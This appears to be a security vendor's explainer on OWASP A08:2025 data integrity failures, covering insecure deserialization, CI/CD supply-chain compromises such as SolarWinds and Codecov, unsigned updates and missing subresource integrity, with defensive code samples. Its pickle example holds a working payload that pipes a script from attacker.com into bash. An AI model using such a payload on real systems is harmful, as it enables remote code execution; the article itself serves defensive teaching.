A08:2025

Data Integrity Failures

When applications make silent assumptions about the trustworthiness of code, data, or software updates — attackers step into that gap and own the pipeline.

Most security vulnerabilities exploit what happens at runtime: a malicious input, a misconfigured endpoint, a weak password. Data integrity failures are different. They happen upstream — before the code even runs, before the user touches the application, sometimes before the application is even deployed. They're the vulnerabilities baked into your trust model.

OWASP A08 covers a cluster of weaknesses that all share one trait: the application (or its build pipeline) blindly trusts data or code it should verify. Insecure deserialization, unsigned software updates, CI/CD pipelines with no integrity checks, JavaScript loaded from CDNs without subresource integrity hashes — all of these are different expressions of the same root failure: assuming something is safe without confirming it.

What exactly counts as a data integrity failure?

The category spans four main problem areas:

Insecure deserialization — parsing attacker-controlled serialized objects that trigger code execution
Insecure CI/CD pipelines — build infrastructure with excessive trust, no signing, or compromised dependencies
Unsigned or unverified software updates — auto-update mechanisms that install whatever the server sends
Missing subresource integrity (SRI) — loading JavaScript or CSS from external CDNs without hash verification

What's notable is that these aren't implementation bugs you find by looking at one function. They're systemic — the result of a supply chain, a pipeline, or a data-handling architecture that was built without thinking about what happens when trust is violated.

Insecure deserialization: code execution hiding in your data layer

Serialization is how applications turn objects in memory into a format they can store or transmit — JSON, XML, Java's native serialization format, Python's pickle, PHP's serialized strings. Deserialization is the reverse: reconstructing that object from the stored bytes. The problem is that many serialization formats are Turing-complete by accident. They don't just carry data — they carry behavior.

In Java, the native serialization format allows objects to define a readObject() method that runs during deserialization. If an attacker can supply a crafted payload that chains together existing classes in the JVM classpath — a technique called "gadget chains" — they can achieve remote code execution without ever bypassing authentication. The Apache Commons Collections library famously contained gadgets that made this trivially exploitable across hundreds of Java applications. The Ysoserial project catalogs dozens of these chains, and most are still valid today.

Python's pickle module is even more direct about it:

# From the Python docs themselves:
# "Warning: The pickle module is not secure.
#  Only unpickle data you trust."

import pickle, os

class Exploit(object):
    def __reduce__(self):
        return (os.system, ('curl https://attacker.com/shell.sh | bash',))

# Serialize:
payload = pickle.dumps(Exploit())

# Attacker sends this payload to any endpoint
# that calls pickle.loads() on user input
# Result: arbitrary command execution

Any application that deserializes user-controlled data using pickle, PHP's unserialize(), Java's ObjectInputStream, or similar mechanisms — especially over untrusted channels like cookies, hidden form fields, or API parameters — is potentially vulnerable. The tell-tale signs in HTTP traffic: binary blobs in cookies, base64-encoded data that decodes to recognizable serialization headers (like rO0AB for Java, or \x80\x04 for Python pickle).

The SolarWinds build attack: CI/CD as the kill zone

In late 2020, SolarWinds disclosed that attackers had injected malicious code into the build process for their Orion IT management platform. The code wasn't inserted into the source repository — it was injected during the build, between the legitimate source code and the signed binary that shipped to customers. The result was a backdoor, signed with SolarWinds' own certificate, distributed as a trusted software update to roughly 18,000 organizations including US government agencies.

The build pipeline itself was the attack surface. No amount of code review, static analysis, or penetration testing of the Orion application would have caught it, because the malicious code was introduced after all of those controls ran. The adversary had access to the build system — a machine that most organizations treat as internal infrastructure rather than a security boundary.

The Codecov breach in 2021 followed the same logic but at a different layer. Attackers modified Codecov's bash uploader script — a shell script widely used in CI pipelines to upload code coverage reports. The tampered script harvested CI environment variables (including tokens, secrets, and credentials) and exfiltrated them. Thousands of CI jobs ran the compromised script before anyone noticed, because organizations pulled the script directly from Codecov's CDN with no integrity verification.

Build infrastructure has become one of the highest-value targets in software supply chain attacks. Compromise the build, and you get code execution on every machine that runs the output — with a valid signature.

The structural problem: most CI/CD pipelines have more trust than they have isolation. Secrets are injected as environment variables accessible to any step. Third-party actions or scripts are pinned to mutable tags rather than immutable SHAs. Pipeline workers have write access to artifact repositories. A single compromised node can contaminate the entire build.

Unsigned software updates

Auto-update mechanisms are a necessary evil — without them, users run outdated software forever, and patching security holes becomes a years-long exercise. But an update mechanism that fetches and executes code over the network without verifying authenticity is essentially a remote code execution endpoint waiting to be abused.

The attack surface here is straightforward: if an update server is compromised, if traffic is intercepted (man-in-the-middle on HTTP update channels), or if the update URL can be manipulated, the application will happily download and execute attacker-controlled code. Historical examples include embedded devices that fetched firmware updates over plain HTTP, desktop applications that checked a vendor server without certificate pinning, and Electron apps that called autoUpdater without signature verification on the update payload.

The correct implementation uses a signing key that the update client knows in advance:

# Secure update check — verify signature before executing
import hashlib, hmac, requests

UPDATE_SERVER = "https://updates.yourapp.com"
SIGNING_KEY_PUBLIC = load_public_key()  # bundled with app

def fetch_and_verify_update(version):
    resp = requests.get(f"{UPDATE_SERVER}/release/{version}.tar.gz")
    sig_resp = requests.get(f"{UPDATE_SERVER}/release/{version}.tar.gz.sig")

    payload = resp.content
    signature = sig_resp.content

    # Verify Ed25519 signature before doing anything with payload
    try:
        SIGNING_KEY_PUBLIC.verify(signature, payload)
    except InvalidSignature:
        raise RuntimeError("Update signature verification failed — aborting")

    return payload  # only reaches here if signature is valid

The signing key must be bundled with the application, not fetched from the same server as the update. Otherwise you've just moved the trust problem one level up.

Subresource Integrity: trusting third-party scripts

When you include a script from a CDN — <script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script> — you're telling the browser: execute whatever bytes arrive from that URL, unconditionally. If that CDN is compromised, or if an attacker can perform DNS hijacking, or if the CDN has a path traversal bug, your users run attacker code with full DOM access.

Subresource Integrity (SRI) is the browser's defense. You add a integrity attribute with a cryptographic hash of the expected file. The browser hashes what it receives and refuses to execute it if the hashes don't match:

<!-- Without SRI: trust whatever cdn.example.com sends -->
<script src="https://cdn.example.com/library.js"></script>

<!-- With SRI: only execute if SHA-384 hash matches -->
<script
  src="https://cdn.example.com/library.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous">
</script>

Generate the hash with: openssl dgst -sha384 -binary library.js | openssl base64 -A. Or use the SRI hash generator for pinning CDN files. Note that SRI only works if you also have a strict Content Security Policy — otherwise an attacker can just inject a new <script> tag that bypasses SRI entirely.

Real-world impact

SolarWinds Orion (2020): 18,000+ organizations compromised by injecting backdoor into the build process. Signed binary, undetectable by endpoint tooling. Attributed to SVR (Russian intelligence).

Codecov breach (2021): CI environment secrets harvested from thousands of pipelines via tampered bash uploader. Affected HashiCorp, Twilio, Rapid7 and others.

event-stream npm package (2018): Malicious maintainer added a dependency that stole Bitcoin wallet keys from Copay users. Package had 2M weekly downloads.

Java deserialization (Apache Commons Collections): Exploited in WebLogic, JBoss, Jenkins, WebSphere — unauthenticated RCE, no user interaction required.

CI/CD security: what "secure" actually means in practice

Defending a CI/CD pipeline isn't one thing — it's a set of independently necessary controls that together raise the bar for attackers:

Pin dependencies to immutable references

In GitHub Actions, pinning to a tag like actions/checkout@v4 means you're trusting whoever controls that tag — which can be moved. Pin to a commit SHA instead:

# Vulnerable — tag can be moved to point at malicious code
- uses: actions/checkout@v4

# Secure — SHA is immutable, this exact commit will always run
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683

Separate build and deploy secrets

Build jobs should not have write access to production environments. Use OIDC federation to grant short-lived credentials at deploy time, scoped to exactly what the job needs.

Sign build artifacts

Use Sigstore/cosign to sign container images and binaries at build time. Verify signatures before deployment:

# Sign an image with cosign (keyless, OIDC-based)
cosign sign --yes ghcr.io/yourorg/yourapp:latest

# Verify before deploying
cosign verify \
  --certificate-identity-regexp "^https://github.com/yourorg/yourapp/" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ghcr.io/yourorg/yourapp:latest

Audit and restrict CI worker permissions

CI workers should have read-only access to source repositories and no direct production access. Treat them like untrusted network segments, not like developer laptops.

Fixing insecure deserialization

The cleanest defense is to not deserialize untrusted data using native serialization formats. Use data-only formats like JSON or protobuf, which don't carry executable behavior. When you parse JSON, you get data — you don't get code execution. When you unpickle a Python object, you might get both.

Where native deserialization is necessary:

Validate the serialized data's format and size before deserializing
In Java, use ObjectInputFilter to allowlist the classes you expect — reject everything else
Never deserialize data from untrusted sources (cookies, query params, message queues that external parties can write to)
Sign serialized payloads and verify the signature before deserializing
Run deserialization in a sandboxed process with no network access and minimal filesystem permissions

// Java: allowlist deserialization with ObjectInputFilter
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
    "com.yourapp.dto.*;java.util.*;!*"  // allow your DTOs + java.util, reject everything else
);

ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(filter);
YourDto obj = (YourDto) ois.readObject();

How to detect these issues in your application

Data integrity failures don't show up in standard DAST scans the way SQL injection does — you can't just fuzz parameters and look for database errors. Detection requires a combination of approaches:

Look for serialized data in the HTTP traffic — binary cookies, base64 blobs in parameters, responses that contain serialization markers. Java's rO0AB in base64 is a dead giveaway.
Audit your CI/CD configuration files — scan .github/workflows/, .circleci/, Jenkinsfile for mutable tag references, broad permissions, and secret injection patterns.
Scan your HTML for SRI-less external scripts — any <script src> or <link rel=stylesheet> pointing to an external domain without an integrity attribute is a finding.
Check your update mechanism — trace the code path that handles software updates and verify that signature checking happens before any execution.
Dependency audit — npm audit, pip-audit, trivy, Dependabot alerts. Known-vulnerable packages are the lowest-hanging fruit.

Automated scanning can catch the low-hanging fruit — SRI violations, known-vulnerable libraries, basic deserialization markers in cookies. But the deeper CI/CD and signing issues require manual review of your build infrastructure. The OWASP SAMM (Software Assurance Maturity Model) provides a structured way to assess and improve your supply chain controls over time.

A08 in the broader context: integrity as a design principle

It's worth stepping back to notice what all A08 vulnerabilities have in common: they're failures of design, not implementation. A developer who uses pickle.loads() on user input didn't make a typo — they made a design decision (maybe without realizing it). A team whose CI pipeline pulls scripts from external URLs with no integrity checks didn't write buggy code — they built a pipeline without thinking about the trust model.

The fix isn't a patch. It's a posture: assume that anything you didn't cryptographically verify could have been tampered with. Code from external registries. Build scripts from CDNs. Serialized objects from session cookies. Software updates from your own server. The more implicit trust your system requires, the larger the attack surface you're accepting.

SolarWinds is the canonical example because it proved that even a correctly-implemented, well-reviewed, properly-signed piece of software can be compromised — if the process that produces it isn't treated as a security boundary. Build pipelines are now attack surfaces. Treat them accordingly.

Check your integrity controls

Test your application for insecure deserialization markers, missing SRI attributes, vulnerable dependencies, and other A08:2025 issues.

Check your integrity controls